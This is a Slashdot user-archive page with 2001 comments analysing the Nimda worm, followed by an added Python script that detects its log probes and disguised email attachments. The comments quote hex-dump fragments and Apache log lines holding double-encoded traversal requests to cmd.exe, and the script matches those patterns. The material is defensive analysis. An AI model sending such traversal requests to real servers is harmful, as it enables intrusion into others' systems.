Slashdot Mirror


User: mglcel

mglcel's activity in the archive.

Stories
0
Comments
3
First seen
Last seen
Profile

Comments · 3

  1. s/namba/nimda/ on New (More) Annoying Microsoft Worm Hits Net · · Score: 1

    it's better..

  2. Concept (CV) Virus - Namba worm ? on New (More) Annoying Microsoft Worm Hits Net · · Score: 3, Informative

    Sorry for the last ugly post, bad manipulation.

    I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.

    After a hexadecimal dump, I noticed this string:

    000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
    000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
    000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
    000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|

    "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

    In the code I can find:

    00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255|
    00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
    00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi|
    00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|

    _vti_bin and _mem_bin are part of my Apache access logs:

    213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
    213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249

    A major part of the mail can be found in the hex dump as:

    000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....<HTML><HEAD>|
    000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |</HEAD><BODY bgC|
    000092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.<iframe src=3Dc|

    which is the code of the HTML part of the mail, or:

    00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
    00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi|
    00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=|
    00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co|
    00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E|
    000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.|
    000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: <EA|

    which corresponds to the mail:

        I 3 readme.exe [audio/x-wav, base64, 75K]
    (mutt output)

    I'm not a virus expert, but if somebody is interested in the readme.exe code or more information, please mail mglcel@gcu-squad.org. I've sent a mail to McAfee support to learn if they know this worm, Concept(CV).

  3. Name of the virus on New (More) Annoying Microsoft Worm Hits Net · · Score: 0, Redundant

    I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.

    After a hexadecimal dump, I noticed this string:

    "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

    In the code I can find:

    00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255|
    00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
    00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi|
    00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|

    _vti_bin and _mem_bin are part of my Apache access logs:

    213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
    213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249

    A major part of the mail can be found in the hex dump as:

    000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....<HTML><HEAD>|
    000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |</HEAD><BODY bgC|
    000092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.<iframe src=3Dc|

    which is the code of the HTML part of the mail, or:

    00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
    00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi|
    00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=|
    00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co|
    00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E|
    000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.|
    000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID: <EA|

    which corresponds to the mail:

        I 3 readme.exe [audio/x-wav, base64, 75K]
    (mutt output)

    I'm not a virus expert, but if somebody is interested in the readme.exe code or more information, please mail mglcel@gcu-squad.org.
    I've sent a mail to McAfee support to learn if they know this worm, Concept(CV).
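Comments 2 and 3 above describe two artifacts a defender can check for mechanically: Apache log lines carrying the double-URL-encoded `..%255c` traversal toward `cmd.exe`, and a MIME part declared `audio/x-wav` whose name is `readme.exe`. The script below is an added example, not code from the commenter or from Slashdot. It scans the two log lines quoted in the comment plus one constructed benign line, and parses a constructed mail whose attachment headers mirror the hex dump; the boundary string, the `cid:` placeholder, the 48-byte stand-in payload (a PE header prefix, nothing runnable), and the small declared-type-to-magic-bytes table are all assumptions of this example.

```python
"""Added example: flag Nimda-style probes in Apache access logs and MIME parts
whose declared Content-Type disagrees with the attachment itself.  Log lines
1-2 are copied from the comment above; the third log line, the sample mail and
the MAGIC_FOR_TYPE table are constructed for this example."""
import base64
import re
from email import message_from_string, policy
from urllib.parse import unquote

# Apache common log format: host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)
INTERPRETERS = ("cmd.exe", "root.exe")
EXECUTABLE_EXTS = {"exe", "com", "scr", "pif", "bat"}
# Leading bytes expected for a few declared types (constructed, not exhaustive).
MAGIC_FOR_TYPE = {"audio/x-wav": b"RIFF", "image/gif": b"GIF8", "application/pdf": b"%PDF"}


def normalize_path(path: str) -> str:
    """Undo nested URL encoding (%255c -> %5c -> '\\') until the string stops
    changing, then treat backslashes as '/' the way the targeted IIS did."""
    prev, cur = None, path
    for _ in range(5):                 # cap the loop; real paths converge in 2-3 steps
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/").lower()


def classify_request(path: str) -> list:
    """Reasons a request path looks like a traversal/command probe ([] if clean)."""
    reasons = []
    once, twice = unquote(path), unquote(unquote(path))
    if once != path and twice != once:  # a second decode still changed it
        reasons.append("double-url-encoding")
    target = normalize_path(path).split("?", 1)[0]
    if "/../" in target or target.endswith("/.."):
        reasons.append("directory-traversal")
    if target.endswith(INTERPRETERS):
        reasons.append("command-interpreter-request")
    return reasons


def scan_access_log(lines):
    """Return (host, path, status, reasons) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                   # malformed line: skip here, alert on it in production
        reasons = classify_request(m["path"])
        if reasons:
            hits.append((m["host"], m["path"], int(m["status"]), reasons))
    return hits


def check_attachment(content_type: str, filename: str, payload: bytes) -> list:
    """Compare the declared type with the file name and the leading bytes."""
    reasons = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in EXECUTABLE_EXTS:
        reasons.append("executable-extension")
    if payload[:2] == b"MZ":           # DOS/PE header: a Windows executable
        reasons.append("pe-magic")
    expected = MAGIC_FOR_TYPE.get(content_type.lower())
    if expected is not None and not payload.startswith(expected):
        reasons.append("declared-type-mismatch")
    return reasons


def scan_mail(raw: str):
    """Return (filename, content_type, reasons) for each suspicious MIME part."""
    msg = message_from_string(raw, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""      # falls back to Content-Type name=
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        reasons = check_attachment(ctype, name, payload)
        if reasons:
            hits.append((name, ctype, reasons))
    return hits


SAMPLE_LOG = [
    '213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249',
    '213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249',
    '192.0.2.10 - - [18/Sep/2001:23:58:01 +0200] "GET /index.html HTTP/1.0" 200 1043',  # constructed, benign
]
# Constructed stand-in for the attachment: a PE header prefix padded with zeros.
FAKE_PE_B64 = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 44).decode()
SAMPLE_MAIL = (
    "From: sender@example.invalid\r\nTo: victim@example.invalid\r\n"
    "Subject: (constructed sample)\r\nMIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="7890DEF_BOUNDARY"\r\n\r\n'
    "--7890DEF_BOUNDARY\r\nContent-Type: text/html\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n\r\n"
    "<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>\r\n<iframe src=3Dcid:PLACEHOLDER></iframe>\r\n"
    "--7890DEF_BOUNDARY\r\nContent-Type: audio/x-wav;\r\n\tname=\"readme.exe\"\r\n"
    "Content-Transfer-Encoding: base64\r\nContent-ID: <PLACEHOLDER>\r\n\r\n"
    + FAKE_PE_B64 + "\r\n--7890DEF_BOUNDARY--\r\n"
)

if __name__ == "__main__":
    for host, path, status, why in scan_access_log(SAMPLE_LOG):
        print(f"{host} {status} {path[:40]}... -> {', '.join(why)}")
    for name, ctype, why in scan_mail(SAMPLE_MAIL):
        print(f"attachment {name!r} declared {ctype} -> {', '.join(why)}")
```

Both probe lines are reported with all three reasons and the benign line is not; the attachment is reported because its name ends in `.exe`, it starts with the `MZ` header, and `audio/x-wav` data would have started with `RIFF`. The repeated `unquote` is the important part of the log check: a single decode leaves `%5c` in place and a naive `..\` or `../` match misses it.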